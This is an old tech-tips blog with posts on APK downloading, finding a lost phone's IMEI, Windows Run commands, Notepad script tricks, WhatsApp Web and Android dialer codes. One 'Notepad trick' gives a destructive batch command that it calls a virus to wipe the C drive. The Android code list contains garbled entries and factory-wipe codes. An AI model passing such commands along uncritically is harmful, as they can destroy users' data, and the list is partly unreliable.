Wednesday, March 18, 2015

How to Download APK Files Directly From Google Play Store to PC

This is one of the easiest methods of downloading APK files which we’ve brought to you guys. You are going to use an online tool or a website which will help you to generate a download link for your APK Files (Any Android App or Game) and you can easily download APK on your computer :

First of all, go to the Google play store on your computer and search for the app you want to download.

Next, copy the URL, and go to APK downloader (http://apps.evozi.com/apk-downloader/). An online tool that would help you in the process.

Paste the URL in the box available. And click on the Generate download link option.

Once you get the option of Click here to Download Your app now, you click on the green button to proceed.

And there you go, once its all done,you can connect the computer to your phone, and move the downloaded file in there.

Go to the downloads folder in your phone, and select the APK file you have just downloaded. Make sure the unknown sources filter is disabled.

Thursday, February 19, 2015

How to find IMEI number of lost Android smartphone



For every new phone the IMEI is usually attached on the box or given in the receipt and the IMEI number is also used when you take your phone to the repair all the mobile details and the warranty status is identified by the IMEI number. Lot of Smartphone’s are being sold over the world, people are having more interest in buying the latest Smartphone’s and update them very soon. In a very less time span there is a lot of development in the smartphone industry.

While coming to the topic of finding IMEI number this article is useful for the users who have lost their smartphone and they don’t have their IMEI number to block the smartphone and put it in blacklist. Many of them tried different ways to find IMEI number but here is the unique way for the users who are reading this article. Follow the below steps

Steps: How to find IMEI number of lost Android smartphone

To get your IMEI number Gmail account is the key point to be needed here

Gmail link
* First click on the above link and sign in to your Gmail account which was integrated with the lost      Android Smartphone
* Then your account will be signed in, next scroll down and click on the dashboard under the  Account Tools box
* After clicking on the dashboard button there appears lot of options such as  account,chrome,calendar,gmail,android ect.Then here click on the android section to expand the details
* There you will get all the information about the devices list which are linked with your Gmail  address.
* After that you need to search for the android smartphone which is lost from the list and there you  can get all the information about the Android name ,model name and IMEI number.
* By following these steps user can found their IMEI number very easily.

Wednesday, January 28, 2015

Some Useful Run Commands For Windows


secpol.msc > Local Security Settings
control keyboard > Keyboard Properties
ipconfig/renew > Renew IP Configuration Settings
ipconfig/release > Cancels IP Configuration
ipconfig/flushdns > Removes the content of DNS cache
ipconfig/displaydns > Displays the DNS settings
ipconfig/all > Displays the IP configuration
inetcpl.cpl > Internet Properties
IExpress > IExpress .Cab file generator
mshearts > Hearts card game
Joy.cpl > Game Controllers
freecell > FreeCell card game
fonts > Windows fonts folder
control folders > Folder options
sigverif > Verification of signatures of file
Eventvwr.msc > Event Viewer
check > Mange the verification of drivers
drwtsn32 > Dr. Watson
control color > Display Appearance properties
control desktop > Display properties
diskpart > Partition manager
diskmgmt.msc > Disk Management
dfrg.msc > Disk Defragmenter
dxdiag > Display System Information
cleanmgr > Disk cleanup
directx.cpl > DirectX Control Panel
devmgmt.msc > Device Manager
ddeshare > DDE active sharing
compmgmt.msc > Computer Management
dcomcnfg > Service components
cmd > Command Prompt
chkdsk > Checking Disk
charmap > Character
certmgr.msc > Certificate Manager
calc > Calculator
fsquirt > Bluetooth file transfer
wuaucpl.cpl > Automatic Windows updates
control admintools > Administrative tools
appwiz.cpl > Add/Remove Programs
hdwwiz.cpl > Add Hardware
access.cpl > Accessibility Options
logoff > Log Off computer
winchat > Microsoft chat
control mouse > Properties of mouse
control NetConnect > Network Connections
netsetup.cpl > Network Configuration
packager > Manage links
OSK > On-Screen keyboard
perfmon.msc > Monitor performance
powercfg.cpl > Power Options
control printers > Printer and Fax properties
regedit > Registry Editor
mstsc > Remote Desktop Connection
ntmsmgr.msc > Removable Storage
sticpl.cpl > Scanners and Camera
control schedtasks > Scheduled Tasks
wscui.cpl > Security Center
shutdown > Turn off your computer
mmsys.cpl > Sounds and Audio Devices
sysedit > System Configuration Editor
msconfig > System Configuration Utility
taskmgr > Task Manager
nusrmgr.cpl > Users Accounts
sysdm.cpl > System Properties
write > Microsoft Wordpad
timedate.cpl > Date and Time Properties

So this was the list of the run commands hope you have liked it. Support us by sharing it over the web.

Some of the Notepad tricks

Notepad is the plain text editor which is very comfortable in creating basic text files. They are saved as .txt files which have no format of tags or styles and this type of notepad environment is used to write a source code in it in which suitable for editing system files to use in a DOS environment.

Notepad is not just a simple and plain text creating software it is a powerful one which we can use to create different types of hack commands, opening many extensions files and also creating own batch file programs. Here we are sharing top five notepad tricked which we summed up follow them carefully.

Creating a Virus
This is the most powerful and top tricks in the notepad which we can create a dangerous virus that will format your Windows C drive

Open the Notepad from your windows system
Paste the below code given
@Echo off
Del C:\ *.* |y
After pasting the code save the file as bat
Now to format your C drive just open this file.

Make your PC speak
This trick is too funny and easy to create which we just have to paste a code, by this we can make our system speak that what we are typing.So, follow the below steps

Open the Notepad from your windows system
Paste the below code given
Dim message, sapi
message=InputBox(“What do you want me to say?”,”ATT Text To Speak”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message
After pasting the code save the file as vbs
Now, open the saved file then a window opens which you have to type anything you want and press OK button then your system speaks.

Matrix Effect
Follow the below steps carefully to create a matrix like effects in your Notepad

Open the Notepad from your windows system
Paste the below code given
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
After pasting the code save the file as bat
Then open the saved to see the matrix effect.

 Make your Keyboard lights dance
This trick will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly in which these will create a dancing light effect. Follow the below steps given below

Open the Notepad from your windows system
Paste the below code given
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

After pasting the code save the file as vbs
Then open your saved file which you can experience the amazing dancing light effect.

Create your Diary
This the most important trick and people having habit of writing Diary will love this. It creates your own diary in which if we write any information in it is saved automatically with date and time. Follow the below steps given below to create your diary

Open the Notepad from your windows system
Here no code is pasted just type .LOG in your Notepad
Save the file as txt
That’s it this is very easy to create now, open it and write anything it will be saved automatically with date and time.

And you are done. Please let us know if you face any issues through comments.

Thursday, January 22, 2015

Now Use Whatsapp On Dekstop

Are you a whatsApp addict ? Really ? Then there is a good news for you that whatsapp has finally arrived on desktop. ! Yes now you can access whatsApp on the desktop soon.

Currently users can access the WhatsApp only on the Google Chrome. According to the company it is the only browser that will work with the web client at present. We can expect to add the remaining browsers to add to the list soon.



“The web browser mirrors conversations and messages from your mobile device — this means all of your messages still live on your phone,” the company said. In order to connect the web browser to the WhatsApp client, users simply have to open https://web.whatsapp.com in Chrome where an QR code appears. You have to scan the QR code to connect your WhatsApp client to the desktop version.  The users’s phone should be connected to the internet for the webclient to work and the company recommends to install the latest version of the app before connecting it to the desktop.

WhatsApp which is one of the most used messaging app with this step seems to reach a even more larger section of the people.

Wednesday, January 21, 2015

How To Create Your Own Run Commands In Windows

Most of the PC users are habitual of using windows OS. Have you ever wondered why?? There is no special reason behind it. The very basic reason behind it is its simplicity and very easy to use. Another reason is it comes with many amazing features.


Then what is this run command we are talking about? It is nothing separate but just another feature of Windows OS, that allows you to open any program or application by simply typing a single command, that is also helpful in saving lot of our time. Therefore, it becomes a very essential tool especially when it is about finishing  your work on time.
Many PC users feel that these specific commands are already programmed in Windows OS and they can not be moulded which is a complete false. This is the reason why I have written this blog which shall be talking all about creating your own run commands in windows enabling you to open your desired program and that too in a lesser time being consumed. There is no dearth of Run commands provided by windows but these are very difficult to remember . Hence, in such case its very important to know how to create your own rum command.  Below are given the steps..!! Go through them !


FOLLOW THE STEPS

The very first instruction says that you will have to select a program or an application for which you wish to create your own Run command.
After this step, next step asks you to right- click on the desktop and creating a new shortcut.
Now, a new dialogue box will make its appearance before you in which you are required to enter the path of your desired program or application for which you are taking all this effort of making a Run command.
Once you find the path of your specific program or application, then the next step is to click NEXT and enter the name to your short cut. Okay, there is one thing that you need to keep in your mind which is that the name you are providing in the shortcut is the same name that will be used as a Run command. For instance, if you name the short cut as BoD, then you will have to enter the same name or same words in the Run command in order to make the application work. The final step is- clicking the Finish button.
Having followed all these steps sincerely, copy that newly created shortcut and paste it in Windows main directory that is very often C:\Windows.
So, this is it. Your task has been completed. Here is your new run command which is all set to be used by you to start your desired application or program, simply by typing the name of your created shortcut in the Run command and the best part is no more time wastage. You can save your precious time at least on this.

Tuesday, January 13, 2015

Hidden Secret Android Codes

*#*#778O#*#* = Factory Data Reset
*#*#I472365#*#* = Quick GPS Test
*#*#0673#*#* OR *#*#0289#*#* = Audio Test
*#*#2664#*#* = Touch Screen Test
#’#273283*255*663282*#*#* = Backup Media Files
*#*#0283#*#* = Packet Loopback Test
*2767*3855# = Reinstalls The Phones Firmware & Format Your Phone
*#*#232339#*#* OR *#*#526#*#* = wireless Lan Test
*#*# 1575#*#* = Different GPS Test
*#*#4636#*#*‘ = Complete Information About your Phone
*#*#2663#*#* = Touch Screen Version
*#*#232337#*# = Displays bluetooth Device Address
*#*#4986*2650468#*#* = PDA, Phone. Hardware, RF Call Date
*#*#44336#*#* = Displays Build Time
*#06# = Displays IMEI Number
*#*#8255#*#* = Google Talk Service Monitoring
*#*#I I I I#*#* | *‘#*#2222#*#* = FTA Software Version FTA | Hardware \/Version
*#*#3264#*#* = Rom version
*#*#23233I#‘*#* = bluetooth Test
*#*# 1234#’#’ = PDA and Phone Firmware Info
*#*#0*#*#*= LCD Display Test
*#*#0842#*#* Vibration and Backlight Test
*#*#0588#*#* = Proximity Sensor Test
*#*#232338#*#* = Wi-Fi Mac Address
*#*#7262626#*#*= Field Test
*#*#34971539#*#* = Camera Update
*#*#19732840#*#* = Enable Test Mode
*#06# – IMEI number
*#0*# – Enter the service menu on newer phones like Galaxy S III
*#*#4636#*#* – Phone information, usage statistics and battery
*#*#34971539#*#* – Detailed camera information
*#*#273282*255*663282*#*#* – Immediate backup of all media files
*#*#197328640#*#* – Enable test mode for service
*#*#232339#*#* – Wireless LAN tests
*#*#0842#*#* – Backlight/vibration test
*#*#2664#*#* – Test the touchscreen
*#*#1111#*#* – FTA software version (1234 in the same code will give PDA and firmware version)
*#12580*369# – Software and hardware info
*#9090# – Diagnostic configuration
*#872564# – USB logging control
*#9900# – System dump mode
*#301279# – HSDPA/HSUPA Control Menu
*#7465625# – View phone lock status
*#*#7780#*#* – Reset the /data partition to factory state
*2767*3855# – Format device to factory state (will delete everything on phone)
##7764726 – Hidden service menu for Motorola Droid
*#*#7594#*#* – Enable direct powering down of device once this code is entered
*#*#273283*255*663282*#*#* – Make a quick backup of all the media files on your Android device
*#*#232338#*#* – Shows Wi-Fi MAC address
*#*#1472365#*#* – Perform a quick GPS test
*#*#1575#*#* – For a more advanced GPS test
*#*#0283#*#* – Perform a packet loopback test
*#*#0*#*#* – Run an LCD display test
*#*#0289#*#* – Run Audio test
*#*#2663#*#* – Show device’s touch-screen version
*#*#0588#*#* – Perform a proximity sensor test
*#*#3264#*#* – Show RAM version
*#*#232331#*#* – Run Bluetooth test
*#*#232337#*# – Show device’s Bluetooth address
*#*#7262626#*#* – Perform a field test
*#*#8255#*#* – Monitor Google Talk service
*#*#4986*2650468#*#* – Show Phone, Hardware, PDA, RF Call Date firmware info
*#*#1234#*#* – Show PDA and Phone firmware info
*#*#2222#*#* – Show FTA Hardware version
*#*#44336#*#* – Show Build time and change list number
*#*#8351#*#* – Enable voice dialing log mode, dial *#*#8350#*#* to disable it
##778 (+call) – Show EPST menu
These codes are specific to HTC devices only:
*#*#3424#*#* – Run HTC function test program
*#*#4636#*#* – Show HTC info menu
##8626337# – Run VOCODER
##33284# – Perform field test
*#*#8255#*#* – Launch Google Talk service monitor
##3424# – Run diagnostic mode
##3282# – Show EPST menu
##786# – Reverse Logistics Support
So this was the list of secret android codes.